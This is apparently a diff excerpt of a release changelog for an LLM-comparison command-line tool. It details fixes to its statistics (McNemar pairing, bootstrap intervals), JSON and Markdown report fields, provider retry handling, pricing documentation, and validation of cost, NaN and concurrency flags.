Two supporting fixes ship with it. The flattener dropped `point_estimate` and `n_samples`, which the bootstrap already computes, so the Markdown report's **Point estimate** column had nothing to print and hard-coded a dash; both fields are now carried and the column is populated. And every interval was rendered at one fixed precision - `.3f` on the console, `.4f` in Markdown - which printed a cost interval of fractions of a cent as `0.0001, 0.0001`, a zero-width interval on a metric that varies, while giving a latency in milliseconds three digits of noise it never measured. Precision is now per metric (cost at six decimals reads `0.000122, 0.000130`), and the console's bare `latency` and `cost` labels carry their units. Rows and lines are labelled by cell rather than by model, with an `SP N` marker matching the runs table when more than one system prompt is in play; the Markdown table gains a legend resolving those markers, since the report is read away from the terminal that printed them. `README.md`'s confidence-interval section is corrected to describe the per-cell grain and to say which intervals a deterministic run will not have.
|
|
240
|
+
|
|
241
|
+
- **McNemar's test paired runs on `run_index` alone, so every cell but the last was silently discarded and the published pass rate was wrong by up to a hundred points.** `run_index` is not an observation: with more than one temperature or system prompt it repeats in every cell, so later cells overwrote earlier ones. Measured on two models, temperatures 0.0 and 0.7, five runs each, where one model hallucinated at 0.7 only - twenty observations went in, the 2x2 table totalled five, and **the same data reported a 0% or a 100% pass rate for a model that passed 50%, depending purely on which cell the dict happened to iterate last.** It now keys on `_pair_key` - `(temperature, system_prompt, run_index)` - the key `_extract_paired_metric_samples` has used for this exact collision since 0.1.8, and both orders agree at the truthful 50% over ten paired runs. This is deliberately **not** the cell tuple `group_states_by_cell` builds: that one names a cell and includes the model, while this one names an observation *within* a model so two models' observations can be intersected.
|
|
242
|
+
|
|
243
|
+
**A pair with no runs in common published a real-looking result.** It emitted `p_value=1.0`, `p_value_corrected=1.0`, `0%` pass rates for both models and `method="no_discordant"` - the same shape a genuinely tested pair takes, and a label that also covers ten paired runs the models agreed on. Such a pair now publishes a null p-value, null pass rates, and its own `method="no_paired_runs"`. **`n_paired` was computed as the denominator of both rates and then discarded; it is now published to JSON and to a new Markdown column**, so a reader can see how many runs were actually compared.
|
|
244
|
+
|
|
245
|
+
**Untestable pairs were spending McNemar's correction budget too**, and `n_comparisons` now means the same thing in both JSON blocks - pairs tested, not pairs formed. The discriminator here is `n_paired == 0`, **not** a null p-value: `mcnemar_test` never returns one (brute-forced over 1600 input combinations - the `None` in its `(None, 1.0)` return is the chi2 slot), so the significance block's predicate transplanted literally would have removed exactly zero rows. That mismatch also orphaned a `p_value is None` branch that could never fire, now removed.
|
|
246
|
+
|
|
247
|
+
**Three field comments described contracts the producer never satisfied**, and so did the docstring: `p_value` claimed "None when n_discordant == 0" when it was `1.0`; `method` listed two of the values it emits; `chi2_statistic` named only the exact-test case; and the docstring promised runs with a missing judge result were "skipped for that pair" when under `run_index` keying a skipped run had its slot refilled from another cell. All four are corrected.
|
|
248
|
+
|
|
249
|
+
**The decline caveat needed its own words.** The significance caveat says a decline stays in the samples that test consumes - true there, and the reverse of what happens here: McNemar drops every declined run before the table is built, and because the test is paired that removes the matching run of every other model too. The new caveat says the paired set shrank, and escapes the model ids it names - a model id is user-supplied, and one carrying a stray closing tag raised `MarkupError` at this console site rather than merely rendering oddly.
|
|
250
|
+
|
|
251
|
+
**None of this had any test coverage.** `tests/` referenced only the pure two-argument `mcnemar_test`; the keying, the tabulation, the pass rates, the correction and the result construction were untested, which is why every defect above passed the whole suite.
|
|
252
|
+
|
|
253
|
+
- **Five JSON fields that were conditional are now always emitted, and the four run-identity fields are written as a unit.** `run_index`, `refused_results`, `cancelled_results` and `total_assertions_refused` all went missing exactly when they read zero. `run_index` appeared only when `--runs > 1`, so **`"run_index" not in row` was a working test for "this was a single run" and is not one any more** - read the value, which is `0`. It is the same argument `total_runs` was made unconditional on directly below: absence was indistinguishable from a version that never emitted the key. **Six tests asserted the old absence and now assert the value** - two for `run_index`, four for the three counts. Byte-identity between the default and `runs=1` is unaffected, because the field is added to both sides - `test_json_format_byte_identical_when_runs_one` still compares the two payloads before it reads either.
|
|
254
|
+
|
|
255
|
+
**`refused_results`, `cancelled_results` and `total_assertions_refused` follow, for the same reason and against a defence that had already expired.** All three were emitted only when non-zero, and all three justified that in a comment as keeping a clean run's payload byte-identical to 0.1.9 - a property `_format_json`'s own docstring says is gone, and was gone before these fields landed. The gate defended nothing while making `0` and "a tool too old to count this" the same observation, on the three fields a CI job is most likely to gate on. **The contradiction was inside a single block**: `total_assertions_errored` sits two fields above `total_assertions_refused` and had the opposite rule, its comment reading "a consumer must not have to read absence as 'nothing errored'" while its neighbour made absence mean "nothing refused". The refusal count now matches it - present whenever the assertions block fires, `0` on the normal path - and the two top-level counts are unconditional like `total_runs`. **Markdown is deliberately unchanged**: a report is prose for a reader, and a line reading "0 cancelled" on every clean run is noise rather than a contract.
|
|
256
|
+
|
|
257
|
+
**What this buys is one join-key shape instead of two.** A consumer keying on `(model, temperature, system, run_index)` now writes that once rather than branching on run count. **What it does NOT do is separate two cells that share a triple.** `_parse_temperatures` and `_resolve_system_prompts` do not de-duplicate - only the model list does, at `_resolve_dynamic_groups` - so `compare "q" --models m --temperatures 0,0` is two cells carrying one `(model, temperature, system)` key, and `run_index` reads `0` on both. `prompt_id` is what tells those apart, and in `compare` it is positional.
|
|
258
|
+
|
|
259
|
+
**Run identity is copied as a unit rather than field by field.** `build_run_identity` is the only producer and returns all four together, so the per-field `in` check this replaced could fire only on a hand-built dict - and would then write a PARTIAL identity block. A payload carrying `run_id` but no `invocation` can tell two runs apart and still not tell `compare` from `batch`, which is the half-answer a consumer cannot act on. It now raises instead. **No payload the CLI writes changes shape from this half**: `compare` and `batch` both build identity unconditionally, so `invocation.command` was already present on all four write paths - stdout and file, both commands - and a new test pins it there rather than leaving it incidental.
|
|
260
|
+
|
|
261
|
+
**Why it matters that `command` is the discriminator and not the payload's shape.** A `batch` payload shares every row key with a `compare` payload once `--no-assertions` is in play, the two assertion keys otherwise present tracking whether assertions RAN rather than which command did; `methodology` is compare-only but is also absent from a 0.1.9 compare payload, so it conflates "batch" with "old tool"; and `batch._parse_txt` mints `p1, p2, p3`, byte-identical to compare's synthetic ids. `invocation.command` is the only field that answers the question.
|
|
262
|
+
|
|
263
|
+
- **`total_runs` and `methodology` are emitted at every run count, and `bootstrap.enabled` no longer advertises a bootstrap that produced nothing.** Both keys appeared only when `--runs > 1`, so **`"total_runs" not in payload` was a working test for "this was a single run" and is not one any more** - read the value, which is `1`. Absence was indistinguishable from a version that never emitted the key, and a consumer testing `total_runs` got a different answer from one testing `stats_by_cell`, which is still runs-gated. Three tests asserted the old absence and now assert the value.
|
|
264
|
+
|
|
265
|
+
**The bug was never the seed.** `bootstrap.enabled` echoed the request flag, resolved before any bootstrap runs and never revisited, so **on a pristine tree a zero-variance model at `--runs 4 --confidence-intervals --bootstrap-seed 42` published `enabled: true` with a complete 5000-resample BCa configuration while `stats_by_cell` held no interval at all and the Markdown report had no interval section** - the same shape when every run in a cell fails. `enabled` now means the bootstrap was ATTEMPTED, a sibling `produced_intervals` carries the outcome, and the Markdown bullet says "attempted, no intervals produced" rather than advertising intervals the document does not contain. The seed is not flipped to compensate: it records what was asked for.
|
|
266
|
+
|
|
267
|
+
At a single run nothing is attempted whatever the flag says, so `enabled` reports `false` with every sibling `null` - otherwise making the block unconditional would have published a seeded bootstrap for a run that provably never had one.
|
|
268
|
+
|
|
269
|
+
**Compare only.** `batch` builds no methodology and this does not give it one: batch has no `--runs`, calls no `run_statistics` function and never imports scipy, so a `scipy_version` there would name a library the command did not load. A single-run compare does now gain a short "Statistical methodology" section in Markdown, deliberately - the tool, scipy and Python versions are worth recording at one run too.
|
|
270
|
+
|
|
271
|
+
**`python_version` moves to patch precision**, matching `scipy_version`. They are one reproducibility record and the split grain pinned the dependency more precisely than the interpreter running it. The nine-language privacy note gains a line: a compare report records the environment that produced it, at every run count.
|
|
272
|
+
|
|
273
|
+
- **CSV and JSON named the same four confidence intervals differently, and the JSON side moved.** `latency_ms_ci_low` against `latency_mean_ms_ci_low`, four for four, so anyone reading both formats carried a translation table. **This change renames no CSV column and leaves the CSV bytes it found untouched** - pinned by hash - because renaming columns would break the header-name reader the layout change promises not to disturb. 0.2.0's CSV does differ from v0.1.9's, by the four columns the layout entry appends; no CSV column in the release is renamed. The JSON side was also the wrong one: **two of its four prefixes named point-estimate keys that do not exist in the record**, so `cost_mean_usd_ci_low` and `score_mean_ci_low` pointed at nothing. `stats_by_cell` also gains `<metric>_ci_n`, matching the new CSV column. A `jq` consumer reading the old JSON names needs updating; there are no `stats_by_cell` recipes in the READMEs.
|
|
274
|
+
|
|
275
|
+
- **The table's example models were a generation behind the registry, and one of them did not exist.** `GPT-5 mini` is not a registry id - there is `gpt-5.4-mini` and `gpt-4o-mini`, but nothing by that name - so that cell was a plain error rather than staleness. Every row now leads with the current flagship: OpenAI gains `GPT-6 Astra`, Anthropic moves to Opus 5 / Sonnet 5 / Fable 5.1, Google to Gemini 3.8 / 3.7 Flash, xAI to Grok 4.6, DashScope to Qwen3.8 Max, Z.AI to GLM-5.3, and Mistral picks up Codestral, which was registered and unlisted. **NVIDIA was checked first and is correct** - its three dead rows are dead at the vendor, not absent from the registry, so the row still describes nine registered ids accurately.
|
|
276
|
+
|
|
277
|
+
**The example NAMES are deliberately not pinned.** "Claude Opus 5" is a marketing name, not a registry id, and a name-to-id mapper would be editorial machinery that goes stale itself - the failure mode this release is trying to close, reintroduced one layer up. The declared COUNTS are pinned instead: three rows state a registered-ID count as a digit, digits are what the parity file's convention already matches, and a sweep that adds or removes a row is exactly what invalidates them.
|
|
278
|
+
|
|
279
|
+
- **The nine READMEs now carry the sweep's date, its limits, and the two dates on which today's prices stop being true.** The rate corrections under Fixed are only half of what changed: someone planning a budget reads the README, not `pricing.py`. Every file states the verification date twice, moved from 2026-07-29 to **2026-09-06** in six localised formats, and the parity suite pins that set against `PRICING_AS_OF` so the two cannot drift apart.
|
|
280
|
+
|
|
281
|
+
**The scope is stated rather than implied.** Groq, Moonshot, NVIDIA and OpenRouter were not fully verified in that pass and are now named in all nine files, so the date cannot be read as "all pricing verified". They are the same four the registry blocks record, repeated where a user will actually meet them.
|
|
282
|
+
|
|
283
|
+
**Both expiry warnings are new, and they are the reason this edit exists.** `gemini-3.6-flash`, `gemini-3.7-flash` and `gemini-3.8-flash` are on introductory rates that DOUBLE on 2027-01-01, and `gpt-5.6-sol` is on a promotional rate that ends around 2026-11-21. **A comparison run today is wrong in November and wrong again in January**, in the direction where every affected model looks uniformly cheaper - so nothing in the output stands out as odd and no reader has a reason to re-check. Recording the corrected rates without these would tell a reader the prices are now right, which is true today and misleading by design.
|
|
284
|
+
|
|
285
|
+
**One documented rule was false and is corrected, in the READMEs and in the registry header alike.** Both said prices are "not batch, priority, off-peak, or promotional pricing". `gpt-5.6-sol` now stores a promotional rate, because OpenAI publishes it as THE price with no concurrent list price beside it, so storing anything else would store a number nobody pays. The exception is annotated, and the rule the file now states is **store what the provider says you will be charged, and prefer the higher figure when the page states two**. `qwen3.7-plus` is the contrasting case and is stored the other way, for the reason given under Fixed.
|
|
286
|
+
|
|
287
|
+
**The list of models called without a temperature gained `gpt-6-astra` and `gemini-3.8-flash`**, in all nine files. That list is a mirror of the registry's `rejects_sampling_params` flags and the parity suite compares the two directly, so it moves whenever the registry does.
|
|
288
|
+
|
|
289
|
+
### Removed
|
|
290
|
+
|
|
291
|
+
- **`magistral-medium-latest` and `magistral-small-latest` are deleted.** Absent from Mistral's pricing page entirely - not Standard, not Batch, not Priority. The reasoning family is gone and Mistral Medium 3.5 now carries the Reasoning tag itself. They are deliberately **not** in `RETIRED_MODELS`: that map exists to name a replacement and raise `RetiredModelError` pointing at it, and Mistral names none. With nothing to name, `UnknownModelError` is the accurate answer. Both were in `all-reasoning`, which is two members shorter in the registry and in all nine README tables.
|
|
292
|
+
|
|
293
|
+
### Fixed
|
|
294
|
+
|
|
295
|
+
- **The nine READMEs called the `output_tokens` span "eight clean runs", which reads as a bound on the model rather than as the size of the sample it came from.** The figures are unchanged and correct - 58 to 66 over eight runs at a fixed input of 10 - but the sentence now says what they cover: those eight are the whole 2026-09-06 sweep, not a selection from it, and the six attempts of fourteen that returned 503 are named as the dead cells they were.
|
|
296
|
+
|
|
297
|
+
- **`diff`'s argument-order warning named `a.json` and `b.json` whatever the files were actually called.** `ordering_warning` took no filename arguments and interpolated the two literals three times, so the one message about which file came first named two files that need not exist: `cli-modelarium diff monday-run.json friday-run.json` reported "a.json started at ..., after b.json at ...". Every other message in the command already threads the typed path - the pre-0.2.0 note fifty lines above does it correctly - so this was the single site that did not. The real names are threaded through and used. **`diff` is new in this release, so no published version emitted the wrong message**; it is recorded here because it is a false statement in user-facing prose. The test that covered the warning asserted only that the words "Swap the arguments" appeared, which the hardcoded literals satisfied, so it passed for as long as the bug existed; it now asserts that the typed names are present and that the hardcoded pair is absent.
|
|
298
|
+
|
|
299
|
+
- **A 503 was never retried, by any provider, so a transient upstream state became a dead cell.** The retry loop catches `RateLimitError` and `ProviderOverloadedError`; nothing mapped a 5xx to either. `google_provider` routed 401/403 and 429 and dropped everything else into a bare `ProviderError`, `openai_provider` (inherited by nine providers) matched 529 alone, and `mistral_provider` had no overload branch at all. Measured on 2026-09-06: **`gemini-3.8-flash` returned 503 "This model is currently experiencing high demand" on 6 of 14 live attempts**, each one landing as a failed cell at 0 tokens and `$0.00` while every other cell in the sweep was billed. The retry machinery was sound and bounded; nothing ever handed it a retryable error.
|
|
300
|
+
|
|
301
|
+
**502, 503, 504 and 529 are now one shared set**, `TRANSIENT_STATUS_CODES` in `providers/_utils.py`, mapped to `ProviderOverloadedError` by all four independent `_reraise` implementations so they cannot drift apart again. No new retry machinery: the existing loop is bounded at `DEFAULT_MAX_RETRIES` with exponential backoff and already worked. **500 is deliberately excluded** - a generic internal error can be a deterministic failure of this exact request, and retrying it three times only bills the latency again.
|
|
302
|
+
|
|
303
|
+
- **`Ctrl-C` exited `1`, which is `EXIT_ASSERTION_FAILED`.** A run killed by a CI timeout reported the code meaning "an assertion did not pass" - a false verdict about the thing the tool exists to measure. SIGINT now exits **`130`** (128 + 2, the POSIX convention) from both `compare` and `batch`, and says so.
|
|
304
|
+
|
|
305
|
+
**The partial run is still not published, and that asymmetry with the cost ceiling is deliberate.** The ceiling stops BETWEEN cells and lets every in-flight call finish, so the states it writes are complete and their costs are known. SIGINT lands wherever it lands, including mid-stream - and usage is read inside the provider's chunk loop, so an interrupted cell has no usage and `mark_error` leaves `cost_usd` at `0.0`. Writing that file would under-report what was actually spent, which is the failure the truncated-run design exists to prevent. Publishing on SIGINT is worth doing once an interrupted cell can report its cost as unknown rather than zero.
|
|
306
|
+
|
|
307
|
+
- **A retried cell reported a time-to-first-token that included every failed attempt and every backoff sleep, so a rate-limited model looked slower than it was.** This one changes a published number: **anyone who compared latency across a run where a model hit a 429 or a 529 may have read a wrong ordering.** `mark_started` ran once per cell and `_start` was never re-based, so `append_text` recomputed TTFT against the original instant on the attempt that finally succeeded. Reproduced with the real `StreamState`: **650 ms reported for an attempt whose true time-to-first-token was near zero**, and at the full three retries the backoff sleeps alone are 7 seconds against real values of 200-2000 ms. It was not noise: rate limiting correlates with provider and model, so the inflation landed on whichever model was throttled, inside a metric that carries a confidence interval and feeds a side-by-side comparison, with nothing on screen connecting the two facts.
|
|
308
|
+
|
|
309
|
+
**Two things were wrong and both are fixed.** `mark_attempt_start` now re-bases the clock at the top of every attempt after the first - *after* the backoff sleep, so the sleep is excluded from the attempt it precedes. And `mark_complete` now lets the provider's own TTFT **overwrite** the orchestrator estimate rather than only filling in for it: every provider measures TTFT and latency off one clock local to its own attempt, so its figure is the authoritative one. The estimate that `append_text` sets as chunks arrive still exists, because the live display needs something to show mid-call, but it no longer wins at the end.
|
|
310
|
+
|
|
311
|
+
**`latency_ms` was never affected and deliberately still excludes retry time.** It is taken from `CompletionResult`, which each provider measures around its own attempt. Leaving it per-attempt keeps it a measure of the model rather than of the provider's queue depth, and `retries` is published separately for anyone who wants to join the two. The two metrics now describe the same attempt, which is what they always claimed to do.
|
|
312
|
+
|
|
313
|
+
- **Three documented claims about cost protection were false, and one of them was the flag's headline description.** No behaviour changes here - the estimates return exactly what they did before - but each of these told a reader the tool guarantees something it does not.
|
|
314
|
+
|
|
315
|
+
**The two estimators claimed to return an upper bound.** `estimate_compare_cost` said *"Upper-bound USD cost estimate"* and *"per-call upper bound"*; `estimate_batch_cost` said *"Return an upper-bound USD cost estimate"*. Both price every call at a flat 500 input / 500 output tokens whatever the real prompt is. **500 output tokens is about a seventh of the 4096-token cap the Anthropic provider sends on every call** - the same call priced at that cap costs **$0.1049 against the $0.0150 estimated, 7.0x** - the input side ignores the prompt's actual length, and judge cost is excluded outright. Measured end to end: a run estimated at **$0.009 spent $0.924**. Both docstrings now say what the figure is, a fixed-shape guess, and point at the ledger as the thing that actually stops a run.
|
|
316
|
+
|
|
317
|
+
**The constants claimed to be conservative.** *"Deliberately on the high side - we'd rather refuse a borderline run than burn through somebody's quota"* described the opposite of what 500/500 does: the estimate built from them lands well under real cost, so it cannot be relied on to refuse a borderline run. The comment now says so, and says why raising the numbers is not the fix - it would refuse cheap runs on a guess.
|
|
318
|
+
|
|
319
|
+
**The README called it a flag "to prevent surprise bills"**, in all nine translations. It does not prevent a bill; it stops dispatching new calls once the ceiling is passed, and calls already in flight still finish. Reworded in every language to say that.
|
|
320
|
+
|
|
321
|
+
- **A per-assertion `error_kind` reaches JSON.** `assertions.py` documents it as a tag precisely so nobody matches on the message text - "changing this tag is visibly a change to a matcher; changing a sentence is not" - and then the serializer dropped it, leaving a consumer no way to tell a refusal from a broken regex per row except by doing exactly what the comment forbids. Additive, `null` on the normal path.
|
|
322
|
+
|
|
323
|
+
- **`examples/reproducibility_analysis.sh` pins `--bootstrap-seed`.** It is the documented publication-grade run, it writes CSV, and it pinned no seed - so two invocations over byte-identical data produced different bounds, measured at **119.6 against 119.1**. `_format_csv` takes no methodology block, so the methodology block's own fix could never have reached that file; the seed had to be pinned in the example and recorded in the new CSV provenance columns.
|
|
324
|
+
|
|
325
|
+
- **The Markdown report could not tell two system prompts apart, and deleted all but one of them.** `_format_markdown` groups by `prompt_id`, took `items[0]` and printed a single `**System (default):**` line from it. With `batch --system-prompts a,b,c` on one prompt - which fans out over one `BatchPrompt`, so all three share a group - the report rendered **three byte-identical rows under three byte-identical output-block headers**, and the other two system prompts appeared **nowhere in the file**. CSV kept all three. This is live today, not introduced by any later change; `compare` escaped it only because every state gets its own synthetic `prompt_id`.
|
|
326
|
+
|
|
327
|
+
**The label was wrong in the other direction too.** When a batch prompt carries its own `system`, that value wins - and then rendered as "System (default)", calling an explicit per-prompt override the default.
|
|
328
|
+
|
|
329
|
+
**Two conditional columns, on all three Markdown surfaces.** `SP` when a group holds more than one distinct system prompt, `Run` when `--runs > 1`, applied to the per-prompt table, the per-cell statistical summary (whose rows are keyed by `(model, temperature, system)` but printed only model and temperature) and the per-output block tag. Markdown emitted `run_index` on no surface at all, so two runs of one cell were indistinguishable except by a heading. With nothing to disambiguate, every section renders exactly as before.
|
|
330
|
+
|
|
331
|
+
**The legend carries the FULL system prompt and is scoped to its own group.** Not a preview: the nine READMEs promise that every output format embeds the full system prompt, and two prompts sharing a long preamble would otherwise render as identical legend entries - a discriminator that does not discriminate. Not computed over the whole file either, or a four-prompt batch repeats every system prompt under every prompt, including under one that ran with none.
|
|
332
|
+
|
|
333
|
+
**A missing system prompt counts as a distinct value**, so a batch group mixing "has one" with "has none" is told apart rather than collapsing to a single value and dropping the column.
|
|
334
|
+
|
|
335
|
+
**One numbering, three populations.** `SP 2` in one table has to mean `SP 2` in another, so the console map, the CI section and the report all now call one `index_distinct_prompts`; only the "is it worth showing" rule differs, and each caller states its own. **`prompt_id` is unchanged** - renaming it is cheap (28 edited lines, suite green) but touches none of this, and it is the documented join key with correct semantics in `batch`.
|
|
336
|
+
|
|
337
|
+
- **The cancelled cell state landed on four fewer surfaces than its own changelog entry claimed.** `89aa560` said a cell stopped by the cost ceiling "stops reading as a free success"; on the four surfaces below it still read as one, and the comment above `compare`'s cost-ceiling exit asserted "a cancelled cell is excluded from every statistic" while three statistics counted it.
|
|
338
|
+
|
|
339
|
+
**The default console printed `ok` at `$0.000000`.** `_display_results` - the `--runs 1` path, reached whenever no `--output` and no `--output-format` is given - renders from `StreamState` and branched on `error` and `refused` only. `89aa560` added `_status_text_for` with a `cancelled` branch and **wired it to nothing**: zero production callers, one caller in a test named `test_console_does_not_say_ok`. Poisoning the helper to raise left the table byte-identical and failed exactly that test, which is what proved it covered nothing. The helper is deleted; the precedence rule it duplicated now lives once, as `status_word`, and the console, Markdown and the new CSV column all call it. The test asserts on the rendered table.
|
|
340
|
+
|
|
341
|
+
**`_build_stats_by_cell` was a fourth `billed` filter.** `89aa560` guarded three in `run_statistics.py` and missed this one, so JSON `stats_by_cell` and the Markdown per-cell table reported a cancelled run as answered - on three completed runs plus one cancelled, **`n_succeeded` read 4**, `output_tokens_mean` fell **50 to 37.5** on a row that produced nothing, and its empty string counted as a second answer, taking `unique_outputs` **1 to 2** and `output_diversity` **0.33 to 0.5**. It takes `not r.cancelled`, not `_is_cancelled`: that helper reads `state.status`, which a `BatchResult` does not have, so it would have returned False for every row and silently done nothing. **Latency and cost were never affected and are pinned so** - a cancelled row's `latency_ms` is None, which the existing filter drops, and its `0.0` joins a list that is only summed.
|
|
342
|
+
|
|
343
|
+
**The console `OK/R/F` triple did not add up.** A cancelled run is in neither `billed` nor `failed`, so it fell out of all three counters: **`2/0/0` under a title reading "3 runs each"**. `RunStats` gains `n_cancelled` and the column becomes `OK/R/F/C` only when a run was cancelled, so every other run keeps the three-slot header.
|
|
344
|
+
|
|
345
|
+
**The Markdown and JSON header totals counted it and named it as nothing** - `Results: 3 (0 failed)` - the same gap `refused` had, one state later. Markdown now says `, 1 cancelled`, only when non-zero, and JSON emits `cancelled_results` - which the shape change above made unconditional, so the two surfaces deliberately differ.
|
|
346
|
+
|
|
347
|
+
- **A cell stopped before it finished is now its own state, instead of reading as a successful free call.** `state_to_result` discarded `StreamState.status` entirely, so a cell that never returned produced a `BatchResult` identical to one that did - `error=None`, `refused=False`, `cost_usd=0.0` - and every format printed **`ok`** at **$0.000000**. `BatchResult` carried `error` and `refused` and no third channel. This adds the third, the same way a refusal got its own status and an errored assertion got its own kind.
|
|
348
|
+
|
|
349
|
+
**The cost is unknown, not zero.** Usage is read inside the provider's `async for chunk in response`; stop the call there and `CompletionResult` never returns, so `mark_complete` never runs and `cost_usd` keeps its default - while the provider did the work regardless. Reporting `0.0` would make the run's total smaller than what was actually incurred. A cancelled cell now renders `unknown` in Markdown, `null` in JSON beside a `cancelled` flag, and an empty cell in CSV. **This change adds and renames no CSV column** - it reuses `cost_usd`. The `status` column that names a cancelled row outright, rather than leaving it to be inferred from an empty cost, is the layout entry's, above.
|
|
350
|
+
|
|
351
|
+
**It poisoned the statistics, and it counted as a success.** `billed` was `[s for s in states if s.error is None]` at three sites, and a cancelled cell satisfies that - so on three completed cells plus one cancelled, `n_succeeded` read **4**, and `output_tokens_mean` fell **50 to 37.5**. Latency and cost do not move - a cancelled cell has no `latency_ms` and the existing `None` filter already drops it - and a test pins that, so the guard is not added to a line that was never broken. All three filters now exclude it, read through `getattr` because the significance and paired-sample tests drive them with duck-typed stand-ins.
|
|
352
|
+
|
|
353
|
+
**And its truncated text was being graded.** A cancelled cell missed both the `state.error` and the `state.refused` branches, so `run_assertions` ran against a partial answer - `contains` on half a reply is not a verdict about the reply. It now joins the errored cell in taking the skip branch.
|
|
354
|
+
|
|
355
|
+
**A cell cancelled during a retry backoff no longer reads as still retrying.** `mark_cancelled` clears `retry_message`, which otherwise left the cell displaying "rate limited, retry in 2.0s" forever with nothing to resolve it.
|
|
356
|
+
|
|
357
|
+
- **A declared exception was never raised, and raising it the obvious way would have made `configure` misreport a bad key as a storage failure.** `InvalidKeyFormatError` sat in `exceptions.py` with a docstring describing exactly what `save_key` does, while `save_key` raised a bare `ValueError` instead. It is now raised.
|
|
358
|
+
|
|
359
|
+
**It subclasses `ValueError`.** Both callers catch `ValueError`: `keys set` renders a panel, and `configure` increments its `invalid` counter and prints *"Invalid format"*. `ConfigurationError` is not a `ValueError`, so raising the class as it stood would have made `keys set` crash with a traceback and made `configure` fall through to its broad `except Exception` - reporting a malformed key as **`not_stored`**, printing *"Could not save"*, and leaving `invalid` at **0**. Measured after the change: `configure` reports `invalid: 1` and *"Invalid format"*, and `keys set` exits 2 with a clean panel. Widening both handlers would have worked too; subclassing is one edit that cannot be half-applied, and it keeps `save_key`'s documented `Raises: ValueError` contract true for anything relying on it.
|
|
360
|
+
|
|
361
|
+
**Nothing else moves.** Only the exception type changed, not what `validate_key` accepts - so no provider whose real key format is a guess from documentation becomes newly locked out, and the twelve key patterns and their 117 tests are untouched. The message still names the provider and never the key.
|
|
362
|
+
|
|
363
|
+
- **`--max-cost nan` silently disabled the cost gate, and three flags wrote a file no strict JSON parser will read.** One cause behind both: **`click.FloatRange` does not reject NaN**, because every comparison with NaN is False and so neither bound ever trips. Every `FloatRange` flag is now a `FiniteFloatRange`, not only the ones that were reported.
|
|
364
|
+
|
|
365
|
+
**The gate.** `estimated > max_cost` is always False when the limit is NaN, so a run the ceiling would block ran to completion instead. Measured: `--max-cost 0.0001` exits 2 with *"Estimated cost $0.7500 exceeds --max-cost $0.0001"*; `--max-cost nan` exited **0** having spent the money. The flag exists to prevent an expensive run and a typo removed the limit entirely. It is now refused at parse; **the enforcement itself is untouched**, and a test pins that a real limit still blocks a real run.
|
|
366
|
+
|
|
367
|
+
**The files.** `--temperatures nan`, `--ci-level nan` and `--significance-threshold nan` each wrote a bare `NaN` into the payload, which RFC 8259 has no syntax for. **The documented `jq` recipe does not error on it - it silently yields `null`**, so the documented workflow read a wrong value rather than failing; a strict parser rejects the whole file, and node's `JSON.parse` refuses it outright. Silent wrong data is the worse of the two, and it is the one a reader was most likely to hit. CSV writes `nan`, which is valid CSV and is left alone.
|
|
368
|
+
|
|
369
|
+
**The statistics were already clean, so fixing the flags fixed the payload.** `paired_t_test` genuinely returns NaN on identical samples and `-inf` on zero-variance samples with different means, but the `zero_variance` and `trivial` guards short-circuit before scipy is called, and `latency_cv` is guarded by `latency_mean_ms > 0`. Every non-finite value that reached a saved file was one the user typed.
|
|
370
|
+
|
|
371
|
+
**No bound is enforced on temperature.** There is no client-side limit anywhere, no documented range in the help text or any of the nine READMEs, and every provider forwards the raw float - and since OpenAI's range extends above 1.0, a 0..1 check would refuse a value that works today. `--temperatures 2.0` still parses, and a test pins that the range check did not ride in on the finiteness fix. Rejecting non-finite is safe; rejecting `>1.0` would be a behaviour change.
|
|
372
|
+
|
|
373
|
+
**`--min-pass-rate` needed nothing.** Its hand-rolled `not (0.0 <= x <= 1.0)` check already refused NaN for exactly the reason click's range does not - the tool's own guard was better than the built-in, and it is what `FiniteFloatRange` is modelled on.
|
|
374
|
+
|
|
375
|
+
- **A typo in `batch --models` produced a raw traceback and reported a failed assertion; `compare` printed a clean panel for the same typo.** `build_batch_states` resolves every model through `get_provider_for_model`, and it was the only user input batch resolved outside any handler - so `batch --models vendor/nope` exited **1** with a traceback where `compare` exited 2 with a message. Exit 1 is `EXIT_ASSERTION_FAILED`, so **a mistyped model name reported the same code as a failing assertion**, which is exactly what a CI gate reads. Both commands now exit 2 with the same message.
|
|
376
|
+
|
|
377
|
+
**`--models` was the whole divergence.** A bad temperature, an unknown judge, a bogus output format or CI method, and a malformed or missing suite file already exited 2 in both commands; tests pin that so the enumeration is on the record.
|
|
378
|
+
|
|
379
|
+
**Two exceptions, not one.** `RetiredModelError` is not a subclass of `UnknownModelError` - they are siblings under `ConfigurationError` - so catching only the one a typo raises would have fixed the typo and left all three retired ids crashing. Both are caught, and `batch` now prints the replacement name the registry exists to provide: `deepseek-chat` to `deepseek-v4-flash`, `deepseek-reasoner` to `deepseek-v4-pro`, `grok-4.1-fast` to `grok-4.3`.
|
|
380
|
+
|
|
381
|
+
**The call is wrapped where it stands rather than hoisted into the earlier resolution guard.** The batch size check (`--force-large`) and the cost ceiling (`--max-cost`) sit between the two, and building states first would allocate one `StreamState` per call for a batch those gates were about to refuse. This narrows what exit 1 means without disambiguating it: five `EXIT_ASSERTION_FAILED` sites remain, and any uncaught exception still lands on the top-level handler's exit 1.
|
|
382
|
+
|
|
383
|
+
- **`--concurrency 0` hung forever with nothing printed, and `-1` reported a failed assertion.** `asyncio.Semaphore(0)` is a valid semaphore that never admits anyone, so every provider call waited on a permit that could not arrive - no error, no timeout, no diagnostic, measured at exit 124 under an eight-second limit. `-1` raised a bare `ValueError: Semaphore initial value must be >= 0` and exited **1**, which is `EXIT_ASSERTION_FAILED`, so a malformed flag reported the same code as a failing assertion. Both now exit 2 with click's range message, and `--concurrency 1` is unchanged.
|
|
384
|
+
|
|
385
|
+
**The hang needed a key, so a first run was never affected.** With nothing configured all three values exit 2 on the key check; only someone who had already set a key could reach the semaphore. There is no first-run hang and no test pretends there is.
|
|
386
|
+
|
|
387
|
+
**A minimum of 1 and deliberately no maximum.** `asyncio.Semaphore` allocates nothing per slot - 5, 10,000 and 10,000,000 all cost about 300 bytes and a few microseconds - and a value above the task count is already a no-op, so a ceiling would refuse a working configuration to prevent nothing. `--concurrency` was a bare `type=int`; `--runs` has used `IntRange(1, 100)` since it was added.
|
|
388
|
+
|
|
389
|
+
**`run_judging` carried its own hard-coded default of 5** rather than importing `DEFAULT_CONCURRENCY`, so the two could drift apart with nothing to catch it. It now imports the constant, and a test asserts the literal is gone.
|
|
390
|
+
|
|
391
|
+
